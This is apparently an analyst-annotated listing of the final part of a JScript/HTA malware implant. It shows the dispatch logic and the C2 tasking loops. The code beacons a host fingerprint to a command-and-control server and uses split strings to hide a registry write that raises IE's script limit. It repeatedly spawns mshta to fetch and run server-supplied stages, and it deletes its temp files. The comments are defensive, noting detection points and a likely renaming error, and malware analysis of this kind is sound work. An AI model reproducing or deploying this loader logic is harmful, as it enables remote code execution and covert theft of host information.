if (loopcount > 180) { |
|
return ""; |
|
} |
|
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); |
|
} |
|
} |
|
} |
|
// Deletes `path` (environment variables expanded) with force=true so read-only
// attributes do not block removal. Used to clean up every temp capture file;
// errors propagate (callers do not catch). Forensics: recovery of %TEMP%\*.log
// and %TEMP%\truew.tmp depends on the deletion not being securely wiped here.
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) { |
|
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true); |
|
}; |
|
// Main dispatch. With the stage marker at its listed value (""), the first-run
// branch executes: raise IE's script-statement limit (HTA only), POST the host
// fingerprint to the C2, spawn `mshta <C2 URL>` for the next stage, then exit.
// When the marker equals "prfx" (presumably patched in by the server for later
// stages) the script instead enters a tasking loop: bounded under mshta,
// unbounded under wscript/cscript. CanHelp / LimitedRunLoop / InfiniteRunLoop
// are function declarations, so they are hoisted and callable from here even
// though they appear later in the file.
// NOTE(review): as listed, funcStruct6 was re-created at line 654 without
// sendDataToCNC, so line 880 would throw; see the notes on both funcStruct6
// definitions -- almost certainly an analyst renaming collision.
try { |
|
if (mainFuncStruct.emptyIfFirstRun != "prfx") { |
|
if (mainFuncStruct.isRunningInMshta()) { |
|
// HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\MaxScriptStatements = 0xFFFFFFFF
// (key and value names split to hide the literals). Presumably raises the
// threshold for IE's "a script on this page is causing your browser to run
// slowly" prompt so the long polling loop is not interrupted -- confirm.
// Detection: this registry write via StdRegProv from mshta.exe.
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles"; |
|
var key = "Ma" + "xScriptStat" + "ements"; |
|
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD); |
|
} |
|
// Initial beacon: host fingerprint over plain HTTP POST.
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo()); |
|
try { |
|
// Next stage: mshta fetches and runs whatever the C2 serves at the job URL.
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); |
|
} catch (e) { |
|
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e) |
|
} |
|
mainFuncStruct.killSelf(); |
|
} else { |
|
if (mainFuncStruct.isRunningInMshta()) |
|
LimitedRunLoop(); |
|
else |
|
InfiniteRunLoop(); |
|
} |
|
} catch (e) { |
|
// Any uncaught error in the dispatch is reported to the C2 (best-effort).
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e); |
|
} |
|
|
|
// One tasking iteration. Returns 1 to keep looping, 0 to stop.
//  - Kill-date: stops when the current epoch ms exceeds highNumber (in this
//    build that is effectively never).
//  - Polls the C2 (POST with empty body, see funcStruct6.sendHTTPRequestEmpty).
//    On 200/201/202 with a non-empty body, the body is used verbatim as a job
//    key and `mshta <C2 URL + jobkey>&` is spawned; status 202 selects the
//    32-bit mshta (SysWOW64) on x64 hosts. Any other status, or any exception
//    (network error, C2 down), stops the loop.
// The response body is never validated before being placed in a command line.
function CanHelp() { |
|
var epoch = new Date().getTime(); |
|
// parseInt without radix; the literal has no leading zero so base 10 applies.
var expire = parseInt(mainFuncStruct.highNumber); |
|
if (epoch > expire) { |
|
return 0; |
|
} |
|
try { |
|
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty(); |
|
if (work.status == 201 || work.status == 202 || work.status == 200) { |
|
if (work.responseText.length > 0) { |
|
var jobkey = work.responseText; |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202); |
|
} |
|
} else { |
|
return 0; |
|
} |
|
} catch (e) { |
|
return 0; |
|
} |
|
return 1; |
|
} |
|
|
|
// wscript/cscript tasking loop: call CanHelp() back-to-back with no sleep
// until it returns 0, then self-terminate. Pacing comes only from the
// synchronous HTTP round-trip, so this is a tight poll against the C2
// (noisy in proxy logs). `an` is unused.
function InfiniteRunLoop() { |
|
var an = "undefined"; |
|
while (CanHelp()); |
|
mainFuncStruct.killSelf(); |
|
} |
|
|
|
// mshta tasking loop: at most 10 CanHelp() iterations ((5*5-15) == 10, starting
// from (1-1) == 0). If CanHelp() reports stop, self-terminate at once.
// After 10 polls it respawns a fresh `mshta <C2 URL>` (job key "") and kills
// this instance -- presumably to keep each mshta process short-lived and reset
// the script-statement budget; confirm. `sn` is always "undefined", so the
// guard at the end is always true.
function LimitedRunLoop() { |
|
var sn = "undefined"; |
|
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) { |
|
if (!CanHelp()) { |
|
mainFuncStruct.killSelf(); |
|
return; |
|
} |
|
} |
|
if (sn == "undefined") { |
|
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); |
|
mainFuncStruct.killSelf(); |
|
} |
|
} |